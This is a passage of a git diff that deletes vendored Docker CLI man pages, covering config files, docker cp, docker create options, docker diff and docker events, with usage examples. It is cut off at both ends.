-set, the client falls back to the default sequence `ctrl-p,ctrl-q`. 
- - -* The `imagesFormat` property specifies the default format for `docker images` -output. When the `--format` flag is not provided with the `docker images` -command, Docker's client uses this property. If this property is not set, the -client falls back to the default table format. For a list of supported -formatting directives, see **docker-images(1)**. - -You can specify a different location for the configuration files via the -`DOCKER_CONFIG` environment variable or the `--config` command line option. If -both are specified, then the `--config` option overrides the `DOCKER_CONFIG` -environment variable: - - docker --config ~/testconfigs/ ps - -This command instructs Docker to use the configuration files in the -`~/testconfigs/` directory when running the `ps` command. - -## Examples - -Following is a sample `config.json` file: - - { - "HttpHeaders": { - "MyHeader": "MyValue" - }, - "psFormat": "table {{.ID}}\\t{{.Image}}\\t{{.Command}}\\t{{.Labels}}", - "imagesFormat": "table {{.ID}}\\t{{.Repository}}\\t{{.Tag}}\\t{{.CreatedAt}}", - "detachKeys": "ctrl-e,e" - } - -# HISTORY -January 2016, created by Moxiegirl diff --git a/vendor/github.com/docker/docker/man/docker-cp.1.md b/vendor/github.com/docker/docker/man/docker-cp.1.md deleted file mode 100644 index 949d60bb8b..0000000000 --- a/vendor/github.com/docker/docker/man/docker-cp.1.md +++ /dev/null @@ -1,175 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-cp - Copy files/folders between a container and the local filesystem. - -# SYNOPSIS -**docker cp** -[**--help**] -CONTAINER:SRC_PATH DEST_PATH|- - -**docker cp** -[**--help**] -SRC_PATH|- CONTAINER:DEST_PATH - -# DESCRIPTION - -The `docker cp` utility copies the contents of `SRC_PATH` to the `DEST_PATH`. -You can copy from the container's file system to the local machine or the -reverse, from the local filesystem to the container. 
If `-` is specified for -either the `SRC_PATH` or `DEST_PATH`, you can also stream a tar archive from -`STDIN` or to `STDOUT`. The `CONTAINER` can be a running or stopped container. -The `SRC_PATH` or `DEST_PATH` can be a file or directory. - -The `docker cp` command assumes container paths are relative to the container's -`/` (root) directory. This means supplying the initial forward slash is optional; -The command sees `compassionate_darwin:/tmp/foo/myfile.txt` and -`compassionate_darwin:tmp/foo/myfile.txt` as identical. Local machine paths can -be an absolute or relative value. The command interprets a local machine's -relative paths as relative to the current working directory where `docker cp` is -run. - -The `cp` command behaves like the Unix `cp -a` command in that directories are -copied recursively with permissions preserved if possible. Ownership is set to -the user and primary group at the destination. For example, files copied to a -container are created with `UID:GID` of the root user. Files copied to the local -machine are created with the `UID:GID` of the user which invoked the `docker cp` -command. If you specify the `-L` option, `docker cp` follows any symbolic link -in the `SRC_PATH`. `docker cp` does *not* create parent directories for -`DEST_PATH` if they do not exist. - -Assuming a path separator of `/`, a first argument of `SRC_PATH` and second -argument of `DEST_PATH`, the behavior is as follows: - -- `SRC_PATH` specifies a file - - `DEST_PATH` does not exist - - the file is saved to a file created at `DEST_PATH` - - `DEST_PATH` does not exist and ends with `/` - - Error condition: the destination directory must exist. 
- - `DEST_PATH` exists and is a file - - the destination is overwritten with the source file's contents - - `DEST_PATH` exists and is a directory - - the file is copied into this directory using the basename from - `SRC_PATH` -- `SRC_PATH` specifies a directory - - `DEST_PATH` does not exist - - `DEST_PATH` is created as a directory and the *contents* of the source - directory are copied into this directory - - `DEST_PATH` exists and is a file - - Error condition: cannot copy a directory to a file - - `DEST_PATH` exists and is a directory - - `SRC_PATH` does not end with `/.` - - the source directory is copied into this directory - - `SRC_PATH` does end with `/.` - - the *content* of the source directory is copied into this - directory - -The command requires `SRC_PATH` and `DEST_PATH` to exist according to the above -rules. If `SRC_PATH` is local and is a symbolic link, the symbolic link, not -the target, is copied by default. To copy the link target and not the link, -specify the `-L` option. - -A colon (`:`) is used as a delimiter between `CONTAINER` and its path. You can -also use `:` when specifying paths to a `SRC_PATH` or `DEST_PATH` on a local -machine, for example `file:name.txt`. If you use a `:` in a local machine path, -you must be explicit with a relative or absolute path, for example: - - `/path/to/file:name.txt` or `./file:name.txt` - -It is not possible to copy certain system files such as resources under -`/proc`, `/sys`, `/dev`, tmpfs, and mounts created by the user in the container. -However, you can still copy such files by manually running `tar` in `docker exec`. -For example (consider `SRC_PATH` and `DEST_PATH` are directories): - - $ docker exec foo tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | tar Cxf DEST_PATH - - -or - - $ tar Ccf $(dirname SRC_PATH) - $(basename SRC_PATH) | docker exec -i foo tar Cxf DEST_PATH - - - -Using `-` as the `SRC_PATH` streams the contents of `STDIN` as a tar archive. 
-The command extracts the content of the tar to the `DEST_PATH` in container's -filesystem. In this case, `DEST_PATH` must specify a directory. Using `-` as -the `DEST_PATH` streams the contents of the resource as a tar archive to `STDOUT`. - -# OPTIONS -**-L**, **--follow-link**=*true*|*false* - Follow symbol link in SRC_PATH - -**--help** - Print usage statement - -# EXAMPLES - -Suppose a container has finished producing some output as a file it saves -to somewhere in its filesystem. This could be the output of a build job or -some other computation. You can copy these outputs from the container to a -location on your local host. - -If you want to copy the `/tmp/foo` directory from a container to the -existing `/tmp` directory on your host. If you run `docker cp` in your `~` -(home) directory on the local host: - - $ docker cp compassionate_darwin:tmp/foo /tmp - -Docker creates a `/tmp/foo` directory on your host. Alternatively, you can omit -the leading slash in the command. If you execute this command from your home -directory: - - $ docker cp compassionate_darwin:tmp/foo tmp - -If `~/tmp` does not exist, Docker will create it and copy the contents of -`/tmp/foo` from the container into this new directory. If `~/tmp` already -exists as a directory, then Docker will copy the contents of `/tmp/foo` from -the container into a directory at `~/tmp/foo`. - -When copying a single file to an existing `LOCALPATH`, the `docker cp` command -will either overwrite the contents of `LOCALPATH` if it is a file or place it -into `LOCALPATH` if it is a directory, overwriting an existing file of the same -name if one exists. For example, this command: - - $ docker cp sharp_ptolemy:/tmp/foo/myfile.txt /test - -If `/test` does not exist on the local machine, it will be created as a file -with the contents of `/tmp/foo/myfile.txt` from the container. If `/test` -exists as a file, it will be overwritten. 
Lastly, if `/test` exists as a -directory, the file will be copied to `/test/myfile.txt`. - -Next, suppose you want to copy a file or folder into a container. For example, -this could be a configuration file or some other input to a long running -computation that you would like to place into a created container before it -starts. This is useful because it does not require the configuration file or -other input to exist in the container image. - -If you have a file, `config.yml`, in the current directory on your local host -and wish to copy it to an existing directory at `/etc/my-app.d` in a container, -this command can be used: - - $ docker cp config.yml myappcontainer:/etc/my-app.d - -If you have several files in a local directory `/config` which you need to copy -to a directory `/etc/my-app.d` in a container: - - $ docker cp /config/. myappcontainer:/etc/my-app.d - -The above command will copy the contents of the local `/config` directory into -the directory `/etc/my-app.d` in the container. - -Finally, if you want to copy a symbolic link into a container, you typically -want to copy the linked target and not the link itself. To copy the target, use -the `-L` option, for example: - - $ ln -s /tmp/somefile /tmp/somefile.ln - $ docker cp -L /tmp/somefile.ln myappcontainer:/tmp/ - -This command copies content of the local `/tmp/somefile` into the file -`/tmp/somefile.ln` in the container. Without `-L` option, the `/tmp/somefile.ln` -preserves its symbolic link but not its content. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit -May 2015, updated by Josh Hawn diff --git a/vendor/github.com/docker/docker/man/docker-create.1.md b/vendor/github.com/docker/docker/man/docker-create.1.md deleted file mode 100644 index 3f8a076374..0000000000 --- a/vendor/github.com/docker/docker/man/docker-create.1.md +++ /dev/null @@ -1,553 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-create - Create a new container - -# SYNOPSIS -**docker create** -[**-a**|**--attach**[=*[]*]] -[**--add-host**[=*[]*]] -[**--blkio-weight**[=*[BLKIO-WEIGHT]*]] -[**--blkio-weight-device**[=*[]*]] -[**--cpu-shares**[=*0*]] -[**--cap-add**[=*[]*]] -[**--cap-drop**[=*[]*]] -[**--cgroup-parent**[=*CGROUP-PATH*]] -[**--cidfile**[=*CIDFILE*]] -[**--cpu-count**[=*0*]] -[**--cpu-percent**[=*0*]] -[**--cpu-period**[=*0*]] -[**--cpu-quota**[=*0*]] -[**--cpu-rt-period**[=*0*]] -[**--cpu-rt-runtime**[=*0*]] -[**--cpus**[=*0.0*]] -[**--cpuset-cpus**[=*CPUSET-CPUS*]] -[**--cpuset-mems**[=*CPUSET-MEMS*]] -[**--device**[=*[]*]] -[**--device-read-bps**[=*[]*]] -[**--device-read-iops**[=*[]*]] -[**--device-write-bps**[=*[]*]] -[**--device-write-iops**[=*[]*]] -[**--dns**[=*[]*]] -[**--dns-search**[=*[]*]] -[**--dns-option**[=*[]*]] -[**-e**|**--env**[=*[]*]] -[**--entrypoint**[=*ENTRYPOINT*]] -[**--env-file**[=*[]*]] -[**--expose**[=*[]*]] -[**--group-add**[=*[]*]] -[**-h**|**--hostname**[=*HOSTNAME*]] -[**--help**] -[**-i**|**--interactive**] -[**--ip**[=*IPv4-ADDRESS*]] -[**--ip6**[=*IPv6-ADDRESS*]] -[**--ipc**[=*IPC*]] -[**--isolation**[=*default*]] -[**--kernel-memory**[=*KERNEL-MEMORY*]] -[**-l**|**--label**[=*[]*]] -[**--label-file**[=*[]*]] -[**--link**[=*[]*]] -[**--link-local-ip**[=*[]*]] -[**--log-driver**[=*[]*]] -[**--log-opt**[=*[]*]] -[**-m**|**--memory**[=*MEMORY*]] -[**--mac-address**[=*MAC-ADDRESS*]] -[**--memory-reservation**[=*MEMORY-RESERVATION*]] -[**--memory-swap**[=*LIMIT*]] -[**--memory-swappiness**[=*MEMORY-SWAPPINESS*]] 
-[**--name**[=*NAME*]] -[**--network-alias**[=*[]*]] -[**--network**[=*"bridge"*]] -[**--oom-kill-disable**] -[**--oom-score-adj**[=*0*]] -[**-P**|**--publish-all**] -[**-p**|**--publish**[=*[]*]] -[**--pid**[=*[PID]*]] -[**--userns**[=*[]*]] -[**--pids-limit**[=*PIDS_LIMIT*]] -[**--privileged**] -[**--read-only**] -[**--restart**[=*RESTART*]] -[**--rm**] -[**--security-opt**[=*[]*]] -[**--storage-opt**[=*[]*]] -[**--stop-signal**[=*SIGNAL*]] -[**--stop-timeout**[=*TIMEOUT*]] -[**--shm-size**[=*[]*]] -[**--sysctl**[=*[]*]] -[**-t**|**--tty**] -[**--tmpfs**[=*[CONTAINER-DIR[:]*]] -[**-u**|**--user**[=*USER*]] -[**--ulimit**[=*[]*]] -[**--uts**[=*[]*]] -[**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*]] -[**--volume-driver**[=*DRIVER*]] -[**--volumes-from**[=*[]*]] -[**-w**|**--workdir**[=*WORKDIR*]] -IMAGE [COMMAND] [ARG...] - -# DESCRIPTION - -Creates a writeable container layer over the specified image and prepares it for -running the specified command. The container ID is then printed to STDOUT. This -is similar to **docker run -d** except the container is never started. You can -then use the **docker start ** command to start the container at -any point. - -The initial status of the container created with **docker create** is 'created'. - -# OPTIONS -**-a**, **--attach**=[] - Attach to STDIN, STDOUT or STDERR. - -**--add-host**=[] - Add a custom host-to-IP mapping (host:ip) - -**--blkio-weight**=*0* - Block IO weight (relative weight) accepts a weight value between 10 and 1000. - -**--blkio-weight-device**=[] - Block IO weight (relative device weight, format: `DEVICE_NAME:WEIGHT`). - -**--cpu-shares**=*0* - CPU shares (relative weight) - -**--cap-add**=[] - Add Linux capabilities - -**--cap-drop**=[] - Drop Linux capabilities - -**--cgroup-parent**="" - Path to cgroups under which the cgroup for the container will be created. If the path is not absolute, the path is considered to be relative to the cgroups path of the init process. 
Cgroups will be created if they do not already exist. - -**--cidfile**="" - Write the container ID to the file - -**--cpu-count**=*0* - Limit the number of CPUs available for execution by the container. - - On Windows Server containers, this is approximated as a percentage of total CPU usage. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-percent**=*0* - Limit the percentage of CPU available for execution by a container running on a Windows daemon. - - On Windows Server containers, the processor resource controls are mutually exclusive, the order of precedence is CPUCount first, then CPUShares, and CPUPercent last. - -**--cpu-period**=*0* - Limit the CPU CFS (Completely Fair Scheduler) period - - Limit the container's CPU usage. This flag tell the kernel to restrict the container's CPU usage to the period you specify. - -**--cpuset-cpus**="" - CPUs in which to allow execution (0-3, 0,1) - -**--cpuset-mems**="" - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. - - If you have four memory nodes on your system (0-3), use `--cpuset-mems=0,1` -then processes in your Docker container will only use memory from the first -two memory nodes. - -**--cpu-quota**=*0* - Limit the CPU CFS (Completely Fair Scheduler) quota - -**--cpu-rt-period**=0 - Limit the CPU real-time period in microseconds - - Limit the container's Real Time CPU usage. This flag tell the kernel to restrict the container's Real Time CPU usage to the period you specify. - -**--cpu-rt-runtime**=0 - Limit the CPU real-time runtime in microseconds - - Limit the containers Real Time CPU usage. This flag tells the kernel to limit the amount of time in a given CPU period Real Time tasks may consume. 
Ex: - Period of 1,000,000us and Runtime of 950,000us means that this container could consume 95% of available CPU and leave the remaining 5% to normal priority tasks. - - The sum of all runtimes across containers cannot exceed the amount allotted to the parent cgroup. - -**--cpus**=0.0 - Number of CPUs. The default is *0.0*. - -**--device**=[] - Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm) - -**--device-read-bps**=[] - Limit read rate (bytes per second) from a device (e.g. --device-read-bps=/dev/sda:1mb) - -**--device-read-iops**=[] - Limit read rate (IO per second) from a device (e.g. --device-read-iops=/dev/sda:1000) - -**--device-write-bps**=[] - Limit write rate (bytes per second) to a device (e.g. --device-write-bps=/dev/sda:1mb) - -**--device-write-iops**=[] - Limit write rate (IO per second) to a device (e.g. --device-write-iops=/dev/sda:1000) - -**--dns**=[] - Set custom DNS servers - -**--dns-option**=[] - Set custom DNS options - -**--dns-search**=[] - Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain) - -**-e**, **--env**=[] - Set environment variables - -**--entrypoint**="" - Overwrite the default ENTRYPOINT of the image - -**--env-file**=[] - Read in a line-delimited file of environment variables - -**--expose**=[] - Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host - -**--group-add**=[] - Add additional groups to run as - -**-h**, **--hostname**="" - Container host name - -**--help** - Print usage statement - -**-i**, **--interactive**=*true*|*false* - Keep STDIN open even if not attached. The default is *false*. - -**--ip**="" - Sets the container's interface IPv4 address (e.g. 172.23.0.9) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ip6**="" - Sets the container's interface IPv6 address (e.g. 
2001:db8::1b99) - - It can only be used in conjunction with **--network** for user-defined networks - -**--ipc**="" - Default is to create a private IPC namespace (POSIX SysV IPC) for the container - 'container:': reuses another container shared memory, semaphores and message queues - 'host': use the host shared memory,semaphores and message queues inside the container. Note: the host mode gives the container full access to local shared memory and is therefore considered insecure. - -**--isolation**="*default*" - Isolation specifies the type of isolation technology used by containers. Note -that the default on Windows server is `process`, and the default on Windows client -is `hyperv`. Linux only supports `default`. - -**--kernel-memory**="" - Kernel memory limit (format: `[]`, where unit = b, k, m or g) - - Constrains the kernel memory available to a container. If a limit of 0 -is specified (not using `--kernel-memory`), the container's kernel memory -is not limited. If you specify a limit, it may be rounded up to a multiple -of the operating system's page size and the value can be very large, -millions of trillions. - -**-l**, **--label**=[] - Adds metadata to a container (e.g., --label=com.example.key=value) - -**--label-file**=[] - Read labels from a file. Delimit each label with an EOL. - -**--link**=[] - Add link to another container in the form of :alias or just - in which case the alias will match the name. - -**--link-local-ip**=[] - Add one or more link-local IPv4/IPv6 addresses to the container's interface - -**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" - Logging driver for the container. Default is defined by daemon `--log-driver` flag. - **Warning**: the `docker logs` command works only for the `json-file` and - `journald` logging drivers. - -**--log-opt**=[] - Logging driver specific options. 
- -**-m**, **--memory**="" - Memory limit (format: [], where unit = b, k, m or g) - - Allows you to constrain the memory available to a container. If the host -supports swap memory, then the **-m** memory setting can be larger than physical -RAM. If a limit of 0 is specified (not using **-m**), the container's memory is -not limited. The actual limit may be rounded up to a multiple of the operating -system's page size (the value would be very large, that's millions of trillions). - -**--mac-address**="" - Container MAC address (e.g. 92:d0:c6:0a:29:33) - -**--memory-reservation**="" - Memory soft limit (format: [], where unit = b, k, m or g) - - After setting memory reservation, when the system detects memory contention -or low memory, containers are forced to restrict their consumption to their -reservation. So you should always set the value below **--memory**, otherwise the -hard limit will take precedence. By default, memory reservation will be the same -as memory limit. - -**--memory-swap**="LIMIT" - A limit value equal to memory plus swap. Must be used with the **-m** -(**--memory**) flag. The swap `LIMIT` should always be larger than **-m** -(**--memory**) value. - - The format of `LIMIT` is `[]`. Unit can be `b` (bytes), -`k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you don't specify a -unit, `b` is used. Set LIMIT to `-1` to enable unlimited swap. - -**--memory-swappiness**="" - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. - -**--name**="" - Assign a name to the container - -**--network**="*bridge*" - Set the Network mode for the container - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. 
- '|': connect to a user-defined network - -**--network-alias**=[] - Add network-scoped alias for the container - -**--oom-kill-disable**=*true*|*false* - Whether to disable OOM Killer for the container or not. - -**--oom-score-adj**="" - Tune the host's OOM preferences for containers (accepts -1000 to 1000) - -**-P**, **--publish-all**=*true*|*false* - Publish all exposed ports to random ports on the host interfaces. The default is *false*. - -**-p**, **--publish**=[] - Publish a container's port, or a range of ports, to the host - format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort - Both hostPort and containerPort can be specified as a range of ports. - When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. (e.g., `-p 1234-1236:1234-1236/tcp`) - (use 'docker port' to see the actual mapping) - -**--pid**="" - Set the PID mode for the container - Default is to create a private PID namespace for the container - 'container:': join another container's PID namespace - 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. - -**--userns**="" - Set the usernamespace mode for the container when `userns-remap` option is enabled. - **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`). - -**--pids-limit**="" - Tune the container's pids limit. Set `-1` to have unlimited pids for the container. - -**--privileged**=*true*|*false* - Give extended privileges to this container. The default is *false*. - -**--read-only**=*true*|*false* - Mount the container's root filesystem as read only. - -**--restart**="*no*" - Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). - -**--rm**=*true*|*false* - Automatically remove the container when it exits. 
The default is *false*. - -**--shm-size**="" - Size of `/dev/shm`. The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), or `g` (gigabytes). If you omit the unit, the system uses bytes. - If you omit the size entirely, the system uses `64m`. - -**--security-opt**=[] - Security Options - - "label:user:USER" : Set the label user for the container - "label:role:ROLE" : Set the label role for the container - "label:type:TYPE" : Set the label type for the container - "label:level:LEVEL" : Set the label level for the container - "label:disable" : Turn off label confinement for the container - "no-new-privileges" : Disable container processes from gaining additional privileges - "seccomp:unconfined" : Turn off seccomp confinement for the container - "seccomp:profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter - -**--storage-opt**=[] - Storage driver options per container - - $ docker create -it --storage-opt size=120G fedora /bin/bash - - This (size) will allow to set the container rootfs size to 120G at creation time. - This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. - For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. - For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option. - Under these conditions, user can pass any size less then the backing fs size. - -**--stop-signal**=*SIGTERM* - Signal to stop a container. Default is SIGTERM. - -**--stop-timeout**=*10* - Timeout (in seconds) to stop a container. Default is 10. 
- -**--sysctl**=SYSCTL - Configure namespaced kernel parameters at runtime - - IPC Namespace - current sysctls allowed: - - kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced - Sysctls beginning with fs.mqueue.* - - Note: if you use --ipc=host using these sysctls will not be allowed. - - Network Namespace - current sysctls allowed: - Sysctls beginning with net.* - - Note: if you use --network=host using these sysctls will not be allowed. - -**-t**, **--tty**=*true*|*false* - Allocate a pseudo-TTY. The default is *false*. - -**--tmpfs**=[] Create a tmpfs mount - - Mount a temporary filesystem (`tmpfs`) mount into a container, for example: - - $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image - - This command mounts a `tmpfs` at `/tmp` within the container. The supported mount -options are the same as the Linux default `mount` flags. If you do not specify -any options, the systems uses the following options: -`rw,noexec,nosuid,nodev,size=65536k`. - -**-u**, **--user**="" - Sets the username or UID used and optionally the groupname or GID for the specified command. - - The followings examples are all valid: - --user [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Without this argument root user will be used in the container by default. - -**--ulimit**=[] - Ulimit options - -**--uts**=*host* - Set the UTS mode for the container - **host**: use the host's UTS namespace inside the container. - Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. - -**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*] - Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker - bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker - container. If 'HOST-DIR' is omitted, Docker automatically creates the new - volume on the host. 
The `OPTIONS` are a comma delimited list and can be: - - * [rw|ro] - * [z|Z] - * [`[r]shared`|`[r]slave`|`[r]private`] - -The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR` -can be an absolute path or a `name` value. A `name` value must start with an -alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or -`-` (hyphen). An absolute path starts with a `/` (forward slash). - -If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the -path you specify. If you supply a `name`, Docker creates a named volume by that -`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR` -value. If you supply the `/foo` value, Docker creates a bind-mount. If you -supply the `foo` specification, Docker creates a named volume. - -You can specify multiple **-v** options to mount one or more mounts to a -container. To use these same mounts in other containers, specify the -**--volumes-from** option also. - -You can add `:ro` or `:rw` suffix to a volume to mount it read-only or -read-write mode, respectively. By default, the volumes are mounted read-write. -See examples. - -Labeling systems like SELinux require that proper labels are placed on volume -content mounted into a container. Without a label, the security system might -prevent the processes running inside the container from using the content. By -default, Docker does not change the labels set by the OS. - -To change a label in the container context, you can add either of two suffixes -`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file -objects on the shared volumes. The `z` option tells Docker that two containers -share the volume content. As a result, Docker labels the content with a shared -content label. Shared volume labels allow all containers to read/write content. -The `Z` option tells Docker to label the content with a private unshared label. -Only the current container can use a private volume. 
- -By default bind mounted volumes are `private`. That means any mounts done -inside container will not be visible on host and vice-a-versa. One can change -this behavior by specifying a volume mount propagation property. Making a -volume `shared` mounts done under that volume inside container will be -visible on host and vice-a-versa. Making a volume `slave` enables only one -way mount propagation and that is mounts done on host under that volume -will be visible inside container but not the other way around. - -To control mount propagation property of volume one can use `:[r]shared`, -`:[r]slave` or `:[r]private` propagation flag. Propagation property can -be specified only for bind mounted volumes and not for internal volumes or -named volumes. For mount propagation to work source mount point (mount point -where source dir is mounted on) has to have right propagation properties. For -shared volumes, source mount point has to be shared. And for slave volumes, -source mount has to be either shared or slave. - -Use `df ` to figure out the source mount and then use -`findmnt -o TARGET,PROPAGATION ` to figure out propagation -properties of source mount. If `findmnt` utility is not available, then one -can look at mount entry for source mount point in `/proc/self/mountinfo`. Look -at `optional fields` and see if any propagaion properties are specified. -`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if -nothing is there that means mount is `private`. - -To change propagation properties of a mount point use `mount` command. For -example, if one wants to bind mount source directory `/foo` one can do -`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This -will convert /foo into a `shared` mount point. Alternatively one can directly -change propagation properties of source mount. Say `/` is source mount for -`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount. 
- -> **Note**: -> When using systemd to manage the Docker daemon's start and stop, in the systemd -> unit file there is an option to control mount propagation for the Docker daemon -> itself, called `MountFlags`. The value of this setting may cause Docker to not -> see mount propagation changes made on the mount point. For example, if this value -> is `slave`, you may not be able to use the `shared` or `rshared` propagation on -> a volume. - - -To disable automatic copying of data from the container path to the volume, use -the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes. - -**--volume-driver**="" - Container's volume driver. This driver creates volumes specified either from - a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag. - See **docker-volume-create(1)** for full details. - -**--volumes-from**=[] - Mount volumes from the specified container(s) - -**-w**, **--workdir**="" - Working directory inside the container - -# EXAMPLES - -## Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Windows. The `--isolation=` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. On Microsoft Windows, you can specify these values: - -* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. -* `process`: Namespace isolation only. -* `hyperv`: Hyper-V hypervisor partition-based isolation. - -Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. 
- -# HISTORY -August 2014, updated by Sven Dowideit -September 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-diff.1.md b/vendor/github.com/docker/docker/man/docker-diff.1.md deleted file mode 100644 index 6c6c502533..0000000000 --- a/vendor/github.com/docker/docker/man/docker-diff.1.md +++ /dev/null @@ -1,49 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-diff - Inspect changes on a container's filesystem - -# SYNOPSIS -**docker diff** -[**--help**] -CONTAINER - -# DESCRIPTION -Inspect changes on a container's filesystem. You can use the full or -shortened container ID or the container name set using -**docker run --name** option. - -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES -Inspect the changes to on a nginx container: - - # docker diff 1fdfd1f54c1b - C /dev - C /dev/console - C /dev/core - C /dev/stdout - C /dev/fd - C /dev/ptmx - C /dev/stderr - C /dev/stdin - C /run - A /run/nginx.pid - C /var/lib/nginx/tmp - A /var/lib/nginx/tmp/client_body - A /var/lib/nginx/tmp/fastcgi - A /var/lib/nginx/tmp/proxy - A /var/lib/nginx/tmp/scgi - A /var/lib/nginx/tmp/uwsgi - C /var/log/nginx - A /var/log/nginx/access.log - A /var/log/nginx/error.log - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-events.1.md b/vendor/github.com/docker/docker/man/docker-events.1.md deleted file mode 100644 index 51b042775a..0000000000 --- a/vendor/github.com/docker/docker/man/docker-events.1.md +++ /dev/null @@ -1,180 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-events - Get real time events from the server - -# SYNOPSIS -**docker events** -[**--help**] -[**-f**|**--filter**[=*[]*]] -[**--since**[=*SINCE*]] -[**--until**[=*UNTIL*]] -[**--format**[=*FORMAT*]] - - -# DESCRIPTION -Get event information from the Docker daemon. Information can include historical -information and real-time information. - -Docker containers will report the following events: - - attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update - -Docker images report the following events: - - delete, import, load, pull, push, save, tag, untag - -Docker volumes report the following events: - - create, mount, unmount, destroy - -Docker networks report the following events: - - create, connect, disconnect, destroy - -# OPTIONS -**--help** - Print usage statement - -**-f**, **--filter**=[] - Filter output based on these conditions - - container (`container=`) - - event (`event=`) - - image (`image=`) - - plugin (experimental) (`plugin=`) - - label (`label=` or `label==`) - - type (`type=`) - - volume (`volume=`) - - network (`network=`) - - daemon (`daemon=`) - -**--since**="" - Show all events created since timestamp - -**--until**="" - Stream events until this timestamp - -**--format**="" - Format the output using the given Go template - -The `--since` and `--until` parameters can be Unix timestamps, date formatted -timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed -relative to the client machine's time. 
If you do not provide the `--since` option, -the command returns only new and/or live events. Supported formats for date -formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`, -`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local -timezone on the client will be used if you do not provide either a `Z` or a -`+-00:00` timezone offset at the end of the timestamp. When providing Unix -timestamps enter seconds[.nanoseconds], where seconds is the number of seconds -that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap -seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a -fraction of a second no more than nine digits long. - -# EXAMPLES - -## Listening for Docker events - -After running docker events a container 786d698004576 is started and stopped -(The container name has been shortened in the output below): - - # docker events - 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) start - 2015-01-28T20:21:31.000000000-08:00 59211849bc10: (from whenry/testimage:latest) die - 2015-01-28T20:21:32.000000000-08:00 59211849bc10: (from whenry/testimage:latest) stop - -## Listening for events since a given date -Again the output container IDs have been shortened for the purposes of this document: - - # docker events --since '2015-01-28' - 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create - 2015-01-28T20:25:38.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start - 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) create - 2015-01-28T20:25:39.000000000-08:00 c21f6c22ba27: (from whenry/testimage:latest) start - 2015-01-28T20:25:40.000000000-08:00 c21f6c22ba27: (from 